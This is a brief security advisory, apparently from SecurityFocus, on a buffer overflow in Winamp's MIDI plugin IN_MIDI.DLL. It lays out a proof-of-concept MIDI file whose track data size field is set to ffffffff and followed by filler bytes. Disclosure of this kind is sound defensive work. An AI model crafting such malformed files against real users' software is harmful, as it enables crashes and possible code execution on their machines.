NullSoft Winamp MIDI Plugin IN_MIDI.DLL Track Data Size Buffer Overflow Vulnerability

The following proof of concept has been supplied:

4 bytes MIDI Header "MThd"
4 bytes Header data size 00000006
2 bytes Format 0000
2 bytes Number of tracks 0001
2 bytes Divisions 0001
4 bytes Track Header "MTrk"
4 bytes Track data size ffffffff <--- bug
... "aaaaaaaaaaaaaaaaaaaaa..." <--- fun


 

Copyright 2010, SecurityFocus